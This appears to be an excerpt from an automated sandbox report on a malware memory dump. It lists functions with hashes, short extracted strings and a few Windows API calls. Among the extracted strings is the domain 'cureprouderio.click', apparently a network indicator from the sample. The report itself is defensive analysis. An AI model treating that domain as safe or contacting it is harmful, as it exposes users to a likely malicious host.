Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 27D$27D
API String ID: 0-4287991475
Opcode ID: e877e220e29689c9cabbb3341e9db57519aa324ce6eecff8ca55655212328650
Instruction ID: 13f2fb567ae027e37f5dbee0752bb93a5195cc7024c3ed58838b16d086488311
Opcode Fuzzy Hash: e877e220e29689c9cabbb3341e9db57519aa324ce6eecff8ca55655212328650
Instruction Fuzzy Hash: 8FD10D36708310CFD708CF69E89066AB7E6FB8A315F0A89BDE88587351D775E901CB85

Function 004436A0 Relevance: 2.9, Strings: 2, Instructions: 417COMMON

Download Yara Rule

Strings

27D, xrefs: 00443722
27D, xrefs: 004436BA

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 27D$27D
API String ID: 0-4287991475
Opcode ID: 9e4b0a84f9869a41dd8416101f8c5a7ce28ddc6e742946bb040728f68e1764ae
Instruction ID: a57120514405273921ef5a2a043a53bf811879220d2742448a8d16d549b27b92
Opcode Fuzzy Hash: 9e4b0a84f9869a41dd8416101f8c5a7ce28ddc6e742946bb040728f68e1764ae
Instruction Fuzzy Hash: B9C10D36708350CFD708CF69E88066AB7E2FB8A315F0A89BDE88587351D675E905CB85

Function 0043DBB0 Relevance: 2.8, Strings: 2, Instructions: 347COMMON

Download Yara Rule

Strings

puv7, xrefs: 0043DC85
NP,?, xrefs: 0043DDD0

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: NP,?$puv7
API String ID: 0-2496799217
Opcode ID: 716b8fc05fcf85928a3e3ddebdba579ea759a7e98796b319378c6a780ea3fe23
Instruction ID: 70b9b60c5aff68ae403a38325789f64acb9c0076ff43820912b179f747863d71
Opcode Fuzzy Hash: 716b8fc05fcf85928a3e3ddebdba579ea759a7e98796b319378c6a780ea3fe23
Instruction Fuzzy Hash: A0914831A043005BE3109F25EC8163BB7A6FBD9328F25A62EE5A5173D1D739EC128799

Function 0042F056 Relevance: 2.8, Strings: 2, Instructions: 277COMMON

Download Yara Rule

Strings

;))5, xrefs: 0042F324
8+2|, xrefs: 0042F319

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 8+2|$;))5
API String ID: 0-2732761446
Opcode ID: 19402870e49f52bd9b89043a55a8bdb631eab6f5adc9fb885bdf5bf9a5e1c2c1
Instruction ID: 0c19babdf3e7e87f49d6330b593a6fa17783e7d6eaea6896a57419ba4525abbb
Opcode Fuzzy Hash: 19402870e49f52bd9b89043a55a8bdb631eab6f5adc9fb885bdf5bf9a5e1c2c1
Instruction Fuzzy Hash: 9881D37164C3D28BE735CB29D9503EBBBE19F93304F9949BDC4C947242C67A080ACB52

Function 0043D8F0 Relevance: 2.7, Strings: 2, Instructions: 238COMMON

Download Yara Rule

Strings

NP,?, xrefs: 0043D960
NP,?, xrefs: 0043D9D0

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: NP,?$NP,?
API String ID: 0-4096726916
Opcode ID: 22bde0d01e998fe5ef17dc118b921f0a09a9552d4a1bf285d58772ecf7a84704
Instruction ID: 0e0890a3c6cf9d6c8490c384e0730259c17dfce4d41537c9bd194b4b72549807
Opcode Fuzzy Hash: 22bde0d01e998fe5ef17dc118b921f0a09a9552d4a1bf285d58772ecf7a84704
Instruction Fuzzy Hash: C0512575A08300EBE3149F15EC41B3B77A6FFD9318F11492DF689472A1D778A812CB6A

Function 0041ABE0 Relevance: 2.7, Strings: 2, Instructions: 198COMMON

Download Yara Rule

Strings

p@, xrefs: 0041AC20
_, xrefs: 0041ACDC

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: _$p@
API String ID: 0-3252485777
Opcode ID: ed803760a7e623e29ddbabd0257e8093d2ed8ff7039b3d032e137b994f79eb42
Instruction ID: 34083ecf63dd979f59bfe067387bdc004dc32fa0616626a2a8114ce7d22aa1f3
Opcode Fuzzy Hash: ed803760a7e623e29ddbabd0257e8093d2ed8ff7039b3d032e137b994f79eb42
Instruction Fuzzy Hash: 6B71F51561868049DB2CDF7488A373BBAE6DF44308F1891BFC955CF697EA38C507878A

Function 0041E4D0 Relevance: 2.6, Strings: 1, Instructions: 1385COMMON

Download Yara Rule

Strings

, xrefs: 0041E56A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 888fb561ef5579ec0fabb91a8ca1885e7f87ff01272557e172e7930adbb4002f
Instruction ID: 1776824ab4e2d2283978c3246e7b894030b635d8d584be364bbf8ee67355065c
Opcode Fuzzy Hash: 888fb561ef5579ec0fabb91a8ca1885e7f87ff01272557e172e7930adbb4002f
Instruction Fuzzy Hash: 89C21471A04A918FC715CF7CC84439DBFA1BB56324F1883ADD8A59B3C2D739A846C792

Function 0042A9F4 Relevance: 1.9, APIs: 1, Instructions: 362COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?), ref: 0042AA1D

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 8cb12b5310bdf08bf04310e212d0b647ab68b0291ca90eded63632836380b153
Instruction ID: b1d7bf14f7a5d9cb06f9b04f1fc58710907a3dcabf6fefa1e6e89884408ff1d9
Opcode Fuzzy Hash: 8cb12b5310bdf08bf04310e212d0b647ab68b0291ca90eded63632836380b153
Instruction Fuzzy Hash: 31B1DF756183219BD710CF24D89179FB7E2EFC5314F04892DE8958B391EB78C90ACB86

Function 0041C0AD Relevance: 1.8, Strings: 1, Instructions: 515COMMON

Download Yara Rule

Strings

Z, xrefs: 0041C5F6

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: Z
API String ID: 0-4100400009
Opcode ID: 48cb96b4630737b39143c7056ed1bd8eafe5efa9831d85960e5d9de4dab2a5f0
Instruction ID: 725109f52953a752b6fc9ecff4735800c2d0c6e8d17f7ed3348d1ff7b2e5bad2
Opcode Fuzzy Hash: 48cb96b4630737b39143c7056ed1bd8eafe5efa9831d85960e5d9de4dab2a5f0
Instruction Fuzzy Hash: D1F1A2B49007018FD3249F39C992663BBB2FF86314B148A9DD4D68FB55E338E846CB95

Function 004150D0 Relevance: 1.8, Strings: 1, Instructions: 501COMMON

Download Yara Rule

Strings

?, xrefs: 00415177

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: ?
API String ID: 0-4248821040
Opcode ID: ec1a59f5baf7e55c360983143af10ec154f9a0fc4c2a926ec8adc2a4d24c5eec
Instruction ID: 9ba0d2598f60ee350e8a08024c2e7b47711ee53ff20a6d271157836baacecbb0
Opcode Fuzzy Hash: ec1a59f5baf7e55c360983143af10ec154f9a0fc4c2a926ec8adc2a4d24c5eec
Instruction Fuzzy Hash: 53E12276508700CBD714DF28DC927ABB3E1EFC2328F09896DE895872D1E7788945CB5A

Function 0042B031 Relevance: 1.7, Strings: 1, Instructions: 486COMMON

Download Yara Rule

Strings

b, xrefs: 0042B521

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: b
API String ID: 0-1942835812
Opcode ID: bfc61237f4368ae5b8daaa39f5e802414faa321b80fa6b0a59140a51a9636205
Instruction ID: 58a311a558a7cbf913821c6730d99d11cb6b47f13e31e09a62011d7c58997409
Opcode Fuzzy Hash: bfc61237f4368ae5b8daaa39f5e802414faa321b80fa6b0a59140a51a9636205
Instruction Fuzzy Hash: E4E125B4A08310CFD7149F24D85166BB7E1EF96308F44897EF896473A2E739D805CB8A

Function 0042DEA0 Relevance: 1.7, Strings: 1, Instructions: 477COMMON

Download Yara Rule

Strings

", xrefs: 0042E19F

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 0712f70a1afc670840c0f8022ae388962244c512cf7483168116c247c1a6a337
Instruction ID: e550527e6f66515f24d924ba555335397c2cfa030b2caccd93de9374d370592c
Opcode Fuzzy Hash: 0712f70a1afc670840c0f8022ae388962244c512cf7483168116c247c1a6a337
Instruction Fuzzy Hash: 5BE17971B083205FD714CE26D450B6BB7E5AF84314F89896FE88A87382DB38DD4587DA

Function 0042AE86 Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

MJ, xrefs: 0042AF42

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: MJ
API String ID: 0-2449967929
Opcode ID: c0536cf5e8e4c27ce5675129cbca273a98fa6dbd9f2a55bb19f6f206332f65e5
Instruction ID: fd523bac623653a8b8a3bb2efad43004d10dd40caa6fe3bb3e6553f7f7b4e763
Opcode Fuzzy Hash: c0536cf5e8e4c27ce5675129cbca273a98fa6dbd9f2a55bb19f6f206332f65e5
Instruction Fuzzy Hash: 74C1E0B4608311CBC714DF24D8A166BB7F2EF92314F08892DE8854B7A2E779D915C78A

Function 00421150 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

q;, xrefs: 00421505

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: q;
API String ID: 0-2699190503
Opcode ID: 50ea3e5b266c9946f75fb27d89d8e6df6357d8ace4a6285b38ade7d9cfc42ff7
Instruction ID: 55829f11e5be365648826d9828167e2809de0530a1beaf9fc373e1ebc0ec46a2
Opcode Fuzzy Hash: 50ea3e5b266c9946f75fb27d89d8e6df6357d8ace4a6285b38ade7d9cfc42ff7
Instruction Fuzzy Hash: 24C113706083108BD728CF28C85276BB7F2EFE6354F488A5DE4D68B3A5E7789901C756

Function 00417EDE Relevance: 1.7, Strings: 1, Instructions: 413COMMON

Download Yara Rule

Strings

A[Ol, xrefs: 004182EF

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: A[Ol
API String ID: 0-1373659052
Opcode ID: 86d19c91dbe241deb17b67ea82af59c6a0f1a134ecb7d9d6644f207a8bc8deab
Instruction ID: 6899753828caf2acb999cbb56acee00dfef2eefb556290b96ff62eb6127f7d0d
Opcode Fuzzy Hash: 86d19c91dbe241deb17b67ea82af59c6a0f1a134ecb7d9d6644f207a8bc8deab
Instruction Fuzzy Hash: 52B1067420C341CBC324CF25C8406B7BBE2FB9A305F69466ED0D697291D73899878B5A

Function 00433E84 Relevance: 1.6, Strings: 1, Instructions: 371COMMON

Download Yara Rule

Strings

m;#q, xrefs: 004340EC

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: m;#q
API String ID: 0-1503513720
Opcode ID: 103e0d9e988a35163db7d39ac1701c3fa994d1cf59547482fad78bf0e6e41d83
Instruction ID: 3c03084745a70e556ebed1dd1dd7b79c3a14fac872f954a5d770d601115f8b41
Opcode Fuzzy Hash: 103e0d9e988a35163db7d39ac1701c3fa994d1cf59547482fad78bf0e6e41d83
Instruction Fuzzy Hash: CEE12872609B808BD3258B38C8943EBBFD29BEA314F1C897DC5EB87386D5786405C716

Function 0041557C Relevance: 1.6, Strings: 1, Instructions: 340COMMON

Download Yara Rule

Strings

NP,?, xrefs: 004155B0

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: NP,?
API String ID: 1279760036-3110377521
Opcode ID: 6ab4d6c65b35389fd773e199ac630c726bf0e54e11e6068adce8b5f935006765
Instruction ID: c4509ece9e893d1ed6b05eff17ccc822f876c47499e0520ccfb35d11fe550f79
Opcode Fuzzy Hash: 6ab4d6c65b35389fd773e199ac630c726bf0e54e11e6068adce8b5f935006765
Instruction Fuzzy Hash: 11A1F174605600DFD314DF19DC41BAB73A2FB86324FA6462EF4558B2E0DB349C92CB89

Function 004354D0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

0, xrefs: 00435577

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: f6145fa20b4dcbf2561b5650be20fd8bcf1a40e6b10dcf1af301407a26c6ec59
Instruction ID: c310dac397559996ecd9662c017152dfecbd7b36ca6ecfb800ae21f947a48daa
Opcode Fuzzy Hash: f6145fa20b4dcbf2561b5650be20fd8bcf1a40e6b10dcf1af301407a26c6ec59
Instruction Fuzzy Hash: F691F037E199904BCB188A3C4C512AA6A534B9B330F2F937BDC759B3D5C62D4D0293A5

Function 00427F37 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

LB, xrefs: 004282BD

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: LB
API String ID: 0-820166116
Opcode ID: 732ae077e5e96be58f478d1a8aa76326abb9a248c6b9bc03ac36ede8df00b56a
Instruction ID: 9c18c0c3d973f10c90e22a696e1a3d8c5495970a34ee8debce4599729f76f369
Opcode Fuzzy Hash: 732ae077e5e96be58f478d1a8aa76326abb9a248c6b9bc03ac36ede8df00b56a
Instruction Fuzzy Hash: FBB1BEB2A183908BE334CF65899135BBBE2FBD1704F158A6DD6D99B304CB759405CF82

Function 00402400 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

", xrefs: 0040240B

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 634addf8dcc215e14109bd4c2b246e644f9137fb6409a00ad6a4b693c5891370
Instruction ID: 60cb5cf4e5ee16d47e2abfc69fcfbf8d7969b18c751281728d4da3dacf33089e
Opcode Fuzzy Hash: 634addf8dcc215e14109bd4c2b246e644f9137fb6409a00ad6a4b693c5891370
Instruction Fuzzy Hash: F8816A71A083459FD7148E68CD883677B919B55304F18897FE48ADB3C2E6BDC886C35A

Function 0042E400 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042E5FE

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 9f731199e07a71066d9450855e4866b19fe001ee434cfe314b1f3d4c2c551ade
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: D571F432B083355BD714CE2AE48031FB7E2ABD5710FA9896FE4949B391D339DC45878A

Function 0042F3EA Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

A, xrefs: 0042F44A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: A
API String ID: 0-3582347099
Opcode ID: 2a0adaf6385c4c3001e46685b5c8d6291d4f3f474aaf0d73743648a3256c8b37
Instruction ID: a8bab52b8fbc6d0733ab0130ae808d643aafbb140479f16af8ddf6a7a0be5c6c
Opcode Fuzzy Hash: 2a0adaf6385c4c3001e46685b5c8d6291d4f3f474aaf0d73743648a3256c8b37
Instruction Fuzzy Hash: 9751E1727187914BD328CB39C8613ABBBE29BD6318F0C857ED4D9C7382DA38D8058751

Function 0042F3E7 Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

A, xrefs: 0042F44A

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: A
API String ID: 0-3582347099
Opcode ID: 7b1633ace7a221261f10b9f3834cde982de3de369d64e6568af7cbf7c5676141
Instruction ID: 4f68d0af35d43d68c7b37c991c111dcdd659a865621ddea3203d7ae48b765861
Opcode Fuzzy Hash: 7b1633ace7a221261f10b9f3834cde982de3de369d64e6568af7cbf7c5676141
Instruction Fuzzy Hash: 7151C1727087914BD328CB3988623ABBBE25BD6318F5C857ED4D9D7382DA38C8058755

Function 0041E0C0 Relevance: 1.4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

Strings

n, xrefs: 0041E22C

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: n
API String ID: 0-2013832146
Opcode ID: ee073d29f6848a1a9770e70c0e3f65d211b9452ffb91a5f9cffac9c067004b26
Instruction ID: fe5a34199ac132b020612b1fd0107fc00f42eb4a96d844d1b63d89e0cc08e129
Opcode Fuzzy Hash: ee073d29f6848a1a9770e70c0e3f65d211b9452ffb91a5f9cffac9c067004b26
Instruction Fuzzy Hash: 4C415C77B496405BE3184A3ACC427AFEAC79BD1320F29C67DB4E5873D5D5B844434316

Function 0042FD51 Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

&, xrefs: 0042FD96

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: fa620edf06c9d24fa68d868c13ee034f5703a9e5a2de35ae1618b6367b84d280
Instruction ID: f87ac1dcab4f4109915ebf4675a123416d731e5497c599cd0d091f0323f429d7
Opcode Fuzzy Hash: fa620edf06c9d24fa68d868c13ee034f5703a9e5a2de35ae1618b6367b84d280
Instruction Fuzzy Hash: 2B21A1312283D18BEB29CB24D4257EBFBE59B93304F4884ADD1C297292D7798409CB16

Function 0042FD4F Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

&, xrefs: 0042FD96

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: &
API String ID: 0-1010288
Opcode ID: 9bc93d6d02d9472a65b5cfab56d509247ab795ffaeccb2e3f54aca848ee48590
Instruction ID: 7e9475464d4deded7d5c72cb1a86bbc2008bd43d269513ecc059cedcbe9c63a2
Opcode Fuzzy Hash: 9bc93d6d02d9472a65b5cfab56d509247ab795ffaeccb2e3f54aca848ee48590
Instruction Fuzzy Hash: 5E1184312283D18BEB18CF24D4657AFFBE59B93304F48846DD1C297291D7B984098B16

Function 00430613 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

2S, xrefs: 0043062B

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: 2S
API String ID: 0-1590380224
Opcode ID: fb0bc950e3e54b52f2e03e11d6b1709fbffdd310cc643e05f1c2e30f59f295ee
Instruction ID: 1130b50ba5b6b24b86863622fefd1dcb6a295625db0fb68720887c1fc8b04905
Opcode Fuzzy Hash: fb0bc950e3e54b52f2e03e11d6b1709fbffdd310cc643e05f1c2e30f59f295ee
Instruction Fuzzy Hash: C5012E301183C08BE7008F29982272FFFE09B97705F18586DE2C1E3282D764C402CB0A

Function 00419B6F Relevance: 1.3, Strings: 1, Instructions: 52COMMON

Download Yara Rule

Strings

IMNO, xrefs: 00419BA5

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: IMNO
API String ID: 2994545307-931391666
Opcode ID: 3a49e630c47144d41704fd7d5ade3aeb036c9c2adcf8e0100a47dee74557473a
Instruction ID: 894fcbe3071573a2e954e1dd00cb0024fc60ba69f423873efafd0b84beb805c6
Opcode Fuzzy Hash: 3a49e630c47144d41704fd7d5ade3aeb036c9c2adcf8e0100a47dee74557473a
Instruction Fuzzy Hash: 6001D2341082409BE7208F29D8A4BFB73E1BBDA328F604729D1D8472E2DB344C92871E

Function 0040C8DE Relevance: 1.3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

Strings

cureprouderio.click, xrefs: 0040C959

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: cureprouderio.click
API String ID: 0-2925096321
Opcode ID: a09ed8f35d9736982b19ae10a279f95ece2886605c9c31e0b35669552686a0bf
Instruction ID: 0cd89b4ce25f9d268ddfe379979b6baf0287994aea6933cb492c452ec2d223e4
Opcode Fuzzy Hash: a09ed8f35d9736982b19ae10a279f95ece2886605c9c31e0b35669552686a0bf
Instruction Fuzzy Hash: 570168363997049AC308CF24DCC27ABB752EBD2304F19A13DE0A1072D5EBB894068749

Function 00442DC5 Relevance: 1.3, Strings: 1, Instructions: 19COMMON

Download Yara Rule

Strings

A;DK, xrefs: 00442DE8

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2890355169.0000000000457000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Rgr8LJz.jbxd

Yara matches

Similarity

API ID:
String ID: A;DK
API String ID: 0-1607071788
Opcode ID: 81dd0e80634b01f3ae3aec5064ad4055bd7038530e1e58471dc224b9b9c830ae
Instruction ID: 4d8c02a939936fa40e5d8c4974ff5a712d152d2f1266212a8843342e0f2c3047
Opcode Fuzzy Hash: 81dd0e80634b01f3ae3aec5064ad4055bd7038530e1e58471dc224b9b9c830ae
Instruction Fuzzy Hash: 81E0BF79901604CFC744CF05D891864B7F2FB9E358B66956DC849E7321CB71A812CF48

Function 00417303 Relevance: 1.3, Strings: 1, Instructions: 11COMMON

Download Yara Rule

Strings

sA, xrefs: 00417319

Memory Dump Source

Source File: 00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

